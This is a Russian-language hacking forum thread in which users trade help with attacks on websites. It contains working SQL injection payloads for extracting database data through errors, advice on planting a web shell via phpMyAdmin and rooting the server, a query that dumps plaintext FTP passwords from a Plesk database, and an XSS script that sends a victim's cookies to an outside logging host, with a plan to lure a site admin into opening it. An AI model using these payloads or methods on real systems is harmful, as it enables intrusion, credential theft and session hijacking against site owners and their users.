29.06.2011, 20:47
|
|
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
С нами:
8674045
Репутация:
214
|
|
|
|
|
29.06.2011, 20:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Sc0rpi0n
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
вот тебе пример запроса:
Сообщение от None
+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+{твой запрос}%29%29,1,63%29,+FLOOR%28RAND%280%29*2 %29%29%29--+
Сообщение от None
+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+concat_ws%280x3a,user%28%29,version%28 %29,database%28%29%29%29,1,63%29,+FLOOR%28RAND%280 %29*2%29%29%29--+
|
|
|
|
01.07.2011, 01:31
|
|
Новичок
Регистрация: 07.02.2008
Сообщений: 13
С нами:
9610168
Репутация:
5
|
|
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
|
|
|
|
01.07.2011, 01:46
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от t0wer
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
pma - это скрипт для управления базами данных и никакого отношения к фтп не имеет. единственный вариант, который возможен - это залить шелл через pma, порутать сервак и выудить фтп акк)
клац
есть ещё вариант найти акк в конфигах сайта. на чём он стоит?
|
|
|
|
01.07.2011, 02:03
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от t0wer
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
Нужно зать что за ПО там стоит, и где хранятся пароли, бывает случаи (например Plesk Panell) где данные хранятся в базе, более того, в не зашифрованном виде, и для того что бы получить полный список всех фтп, достаточно выполнить:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT REPLACE[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]home[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/home/httpd/vhosts/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) AS[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]accounts[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]password FROM sys_users
LEFT JOIN accounts on sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]account_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]accounts[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]id
ORDER BY sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]home ASC[/COLOR][/COLOR]
Но в большинстве случаев, конечно же пароли так просто не достать, так что как минимум нужно закрепится, и начать исследовать систему изнутри.
|
|
|
|
01.07.2011, 17:20
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 1
С нами:
9816861
Репутация:
0
|
|
почему когда я ввожу
Сообщение от None
http://www.jertva.ru/search?q=
То в ифрейме выводит содержимое .js файла ? |
|
|
|
01.07.2011, 17:29
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо
__________________
|
|
|
|
01.07.2011, 17:41
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 1
С нами:
9816861
Репутация:
0
|
|
Сообщение от +toxa+
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо
Спасибо большое, там работает только iframe.
Получилось так:
Содержимое xss.php
Код:
img = new Image();
img.src = "http://httpz.ru/nlj6byr15oq.gif?"+document.cookie;
Теперь когда захожу по адресу, присылает:
Код:
IP: **.***.22.87
Query: empty
REFERER: http://site.ru/xss.php
AGENT: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
это значит работает ? Можно админу отправлять на почту ссылку ? если бы были кукисы, оно бы мне прислало их ?
|
|
|
|
01.07.2011, 17:53
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
зайди на site.ru , потом в адресной строке напиши
Код:
javascript:document.cookie='test_cookie=31337';
и попробуй заюзать свою xss ещё раз. узнаешь наверняка.
__________________
|
|
|
|
01.07.2011, 17:56
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 1
С нами:
9816861
Репутация:
0
|
|
таким способом присылает куки с моего сайта, а не с сайта жертвы.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
